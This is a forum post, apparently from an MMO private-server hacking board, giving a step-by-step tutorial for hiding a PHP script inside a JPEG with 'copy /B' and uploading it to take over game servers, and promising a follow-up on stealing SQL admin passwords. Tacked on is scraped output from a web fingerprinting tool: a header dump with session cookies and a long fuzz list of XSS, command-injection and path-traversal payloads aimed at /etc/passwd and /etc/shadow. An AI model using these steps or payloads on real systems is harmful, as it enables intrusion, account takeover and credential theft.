Alright hello everyone and welcome to my little tutorial!
You may be like omg noob he hes epic failed once here he goes again.
You can just press Alt+F4 now!
Today what we're going to be doing is finding a Local File Inclusion (LFI) flaw in a website. This once worked for toxic-wow, but no longer does. Don't ask me why, but it doesn't!
So we're going to start off by binding a new image file with our new .txt file that has been coded to exploit the server.
Now before we have a new image, we need to custimize this php script written and made by me.
Free File Hosting Made Simple - MediaFire
LFI.txt
Now edit the VALUEs so the first `login` REMAINS `login` BUT "login" goes whatever your login name is emaple i'd put "wolfe"
Now where ever you file is uploaded you need to put as many ../ as there is /
Example if theres a link.
http://examplesite.com/avatars/upload/coolimage.jpg
You would need 2 ../ so the config would look like
include("../../stats/config.php");
OK now that you have that file configured for you we need to combine it with an image any image this is my favorite.
If you want to use this do a Right Click save as Test.jpg
Next we're going to use command prompt to binary bind two files together!
If you don't know how to get to command prompt this tutorial is too hard for you and should just leave now.
Next open up where you have your files saved at they should both be saved in the same folder just for easy access.
Mine is C:\LFI
So the command we want isAfter that press enter!Code:cd C:LFI/
So now it should say
C:\LFI>(You can enter text here, omg so cool, eh !!!!)
The next command we want to do is.
The image MUST be first otherwise it won't work!Code:copy /B imagehere.jpg + phpcodehere.txt NewFileNamehere.jpg
Now it doesn't matter if you do .txt or .php but I find txt to work better and more comptable with more images.
So now you should see a new file the one we just created NewFileNameHere.jpg
TEST IT! Open it with notepad and see if if you can find our PHP script!
Now go upload it to a site and run it, if it works you can now log in with the details you config'd up above. If it didn't well you can't!
So thats pretty much it, if you guys aren't sure how to set up your config or something feel free to post here and ill answer.
If I get POSTIVE comments on this I might show you guys how to retrive the SQL admin username and password for a Private Server, pretty much COMPLETE control!
Also Free File Hosting Made Simple - MediaFire is where all the files that I used is stored in, include the final result! Enjoy!
~Wolfe<div style="border: 1px outset gray; padding: 1%; display: none; opacity: 0; position: absolute; left: 10%; right: 10%; top: 1%; text-align: left; background-color: black; color: white; float: right;" id="yehgfingerprint">YEHG.Net Greasemonkey Web Page Fingerprinter[COLOR=yellow ! important][x][/COLOR]
[URL]
http://www.mmowned.com/forums/emulator-server-exploits-bugs/164811-tutorial-getting-gm-most-private-servers.html
[Headers]
Server: LiteSpeed
X-Powered-By: PHP/5.2.6
Date: Wed, 10 Sep 2008 22:42:50 GMT Connection: Keep-Alive Cache-Control: private Pragma: private Content-Type: text/html; charset=ISO-8859-1 X-UA-Compatible: IE=7 Content-length: 149109
Cookie: IDstack=%2C57342%2C%2C349757%2C; __utma=67421069.334934750.1231293359.1231536738.1231540886.13; __utmz=67421069.1231295481.1.2.utmccn=(organic)|utmcsr=google|utmctr=ascent+maki ng+a+admin+account+via+sql|utmcmd=organic; __qca=48aba167-91b44-a128e-21969; bblastvisit=1220993554; bblastactivity=0; PHPSESSID=bd1cf1607d33e6b2a440586c4a00cdca; __qcb=931531576; __utmc=67421069; __utmb=67421069
=> [COLOR=yellow ! important]Edit Cookie[/COLOR]
[RECON]
---Lookup---WebhostinfoDNSStuffRobtexDNSNetwork DNSRecordsDomainToolsSamSpadeHost2IPNetcraft WhatSiteNetcraft SiteReportNetwork TracertNetwork LookupNetwork WhoisBetterwhoisNetwork ExpressPortScan1PortScan2FlashPortScanMX ProfileMX LookupMX RecordsdirIndexingcache:link:site:emailfiledffile:xlsfile:xmlfile:docfile
ptfile:txtfile:rtffile:conffile:configfile:inifile:lstfile:zipfile:gzipfile:emlf ile
sfile:exefile:rpmfile:dbfile:mdbfile:logfile
asswdfile
wd [[COLOR=yellow ! important]Launch all[/COLOR]] [[COLOR=yellow ! important]Prepend Proxy[/COLOR]]
[BruteForce Scan]
-- Select ---Dic-SmallDic-ComprehensiveBigCatalaCommonEuskeraMediumPasslistSpanishSubdomainsUserlistWeak_p asswords_module_passlistWeak_passwords_module_userlistCommon_passNamesApacheCgiC gisColdfusionDominoFatwireFatwire_pagenamesFrontpageIisIplanetJrunNetwareOracle9 iSharepointSunasTestsTomcatVignetteWeblogicWebsphereo-iiso-cfmo-jsp [[COLOR=yellow ! important]Start[/COLOR]] [[COLOR=yellow ! important]View[/COLOR]]
Loading ...
Do other stuffs.
Seem slowly? As it doesn't do multi-requests,
it's likely that web server IDS may not detect scanning.
But it's for dictionary scanning only.
[Stat]
Total Form: 0
Total Link: 3
[Fuzz URL]
http://www.mmowned.com/forums/emulat...servers.html?=
Select Fuzz Type: Fuzz [default]BackupFilesHeaderCheckCSRFCS Framing [[COLOR=yellow ! important]Help[/COLOR]]
Fuzz Options Fuzz Db: -- Check --1) ---!><!--">xxx<P>yyy..2) "><script>"..3) <script>..</script>..4) <<script>..;//<<..5) <script>..</script>..6) '><script>..<..7) "><script>..;</script>..\";..;//..9) %3cscript%3e..;%3c/script%3e..10) %3cscript%3e..;%3c%2fscript%3e..11) %3Cscript%3E..;%3C/script%3E..12) <script>..;</sc..13) <script>..;<..14) <xss><script>alert('XSS')<..15) <IMG%20SRC='javascript:..16) <IMG SRC="javascript:alert('XSS'..17) <IMG SRC="javascript:alert('XSS'..1
<IMG SRC=javascript:alert('XSS')>..19) <IMG SRC=JaVaScRiPt:alert('XSS')>..20) <IMG SRC=javascript:alert("XSS&quo..21) <IMG SRC=`javascript:alert("'XSS'..22) <IMG """><SCRIPT>alert(..23) <IMG SRC=javascript:alert(String.fromCharCode(8..24) <IMG%20SRC='javasc ript:..25) <IMG SRC="jav ascript:alert('XSS'..26) <IMG SRC="jav	ascript:alert('..27) <IMG SRC="jav
ascript:alert('..2
<IMG SRC="jav
ascript:alert('..29) <IMG SRC=" javascript:alert(..30) <IMG DYNSRC="javascript:alert('XSS..31) <IMG LOWSRC="javascript:alert('XSS..32) <IMG%20SRC='%26%23x6a;avasc%26%23000010rip..33) <IMG SRC=java..34) <IMG SRC=ja..35) <IMG SRC=java&a..36) '%3CIFRAME%20SRC=javascript:alert(%2527XSS%25..37) %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A..3
';alert(String.fromCharCode(88,83,83))//\..39) '';!--"<XSS>=&{()}..40) A..41) TRUE..42) FALSE..43) 0..44) 00..45) 1..46) -1..47) 1.0..4
-1.0..49) 2..50) -2..51) -20..52) 65536..53) 268435455..54) -268435455..55) 2147483647..56) 0xfffffff..57) NULL..5
null..59) \0..60) \00..61) < script > < / script>..62) %0a..63) %00..64) +%00..65) \0..66) \0\0..67) \0\0\0..6
\00..69) \00\00..70) \00\00\00..71) $null..72) $NULL..73) `id`..74) `dir`..75) ;id;..76) ;read;..77) ;netstat -a;..7
\nnetstat -a%\n..79) \"blah..80) |id|..81) ";id"..82) id%00..83) id%00|..84) |id..85) |dir..86) |dir|..87) |ls..8
|ls -la..89) ;ls -la..90) ;dir..91) |/bin/ls -al..92) \n/bin/ls -al\n..93) ?x=..94) ?x="..95) ?x=|..96) ?x=>..97) /index.html|id|..9
/boot.ini..99) /etc/passwd..100) /etc/shadow..101) ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8...102) ../../../../../../../../../../../../etc/hosts%00..103) ../../../../../../../../../../../../etc/hosts..104) ../../boot.ini..105) /../../../../../../../../%2A..106) ../../../../../../../../../../../../etc/passwd%00..107) ../../../../../../../../../../../../etc/passwd..10
../../../../../../../../../../../../etc/shadow%00..109) ../../../../../../../../../../../../etc/shadow..110) /../../../../../../../../../../etc/passwd^^..111) /../../../../../../../../../../etc/shadow^^..112) /../../../../../../../../../../etc/passwd..113) /../../../../../../../../../../etc/shadow..114) /./././././././././././etc/passwd..115) /./././././././././././etc/shadow..116) \..\..\..\..\..\..\..\..\..\..\etc\pas..117) \..\..\..\..\..\..\..\..\..\..\etc\sha..11
..\..\..\..\..\..\..\..\..\..\etc\passw..119) ..\..\..\..\..\..\..\..\..\..\etc\shado..120) /..\../..\../..\../..\../..\../..\../etc/pas..121) /..\../..\../..\../..\../..\../..\../etc/sha..122) .\\./.\\./.\\./.\\./.\\./.\\./etc/pass..123) .\\./.\\./.\\./.\\./.\\./.\\./etc/shad..124) \..\..\..\..\..\..\..\..\..\..\etc\pas..125) \..\..\..\..\..\..\..\..\..\..\etc\sha..126) ..\..\..\..\..\..\..\..\..\..\etc\passw..127) ..\..\..\..\..\..\..\..\..\..\etc\shado..12
%0a/bin/cat%20/etc/passwd..129) %0a/bin/cat%20/etc/shadow..130) %00/etc/passwd%00..131) %00/etc/shadow%00..132) %00../../../../../../etc/passwd..133) %00../../../../../../etc/shadow..134) /../../../../../../../../../../../etc/passwd%00.jp..135) /../../../../../../../../../../../etc/passwd%00.ht..136) /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0..137) /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0..13
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/..139) /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/..140) %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%2..141) /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%..142) %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%2..143) %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%2..144) /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%..145) \\'/bin/cat%20/etc/passwd\\'..146) \\'/bin/cat%20/etc/shadow\\'..147) ../../../../../../../../conf/server.xml..14
/../../../../../../../../bin/id|..149) C:/inetpub/wwwroot/global.asa..150) C:\inetpub\wwwroot\global.asa..151) C:/boot.ini..152) C:\boot.ini..153) ../../../../../../../../../../../../localstart.asp..154) ../../../../../../../../../../../../localstart.asp..155) ../../../../../../../../../../../../boot.ini%00..156) ../../../../../../../../../../../../boot.ini..157) /./././././././././././boot.ini..15
/../../../../../../../../../../../boot.ini%00..159) /../../../../../../../../../../../boot.ini..160) /..\../..\../..\../..\../..\../..\../boot.in..161) /.\\./.\\./.\\./.\\./.\\./.\\./boot.in..162) \..\..\..\..\..\..\..\..\..\..\boot.ini..163) ..\..\..\..\..\..\..\..\..\..\boot.ini%0..164) ..\..\..\..\..\..\..\..\..\..\boot.ini..165) /../../../../../../../../../../../boot.ini%00.html..166) /../../../../../../../../../../../boot.ini%00.jpg..167) /.../.../.../.../.../..16
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%..169) /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/..170) %0d%0aX-Injection-Header:%20AttackValue..171) !@#0%^#0##018387@#0^^**(()..172) %01%02%03%04%0a%0d%0aADSF..173) /,%ENV,/..174) <!--#exec%20cmd="/bin/cat%20/etc/p..175) <!--#exec%20cmd="/bin/cat%20/etc/s..176) %..177) #..17
*..179) }..180) ;..181) /..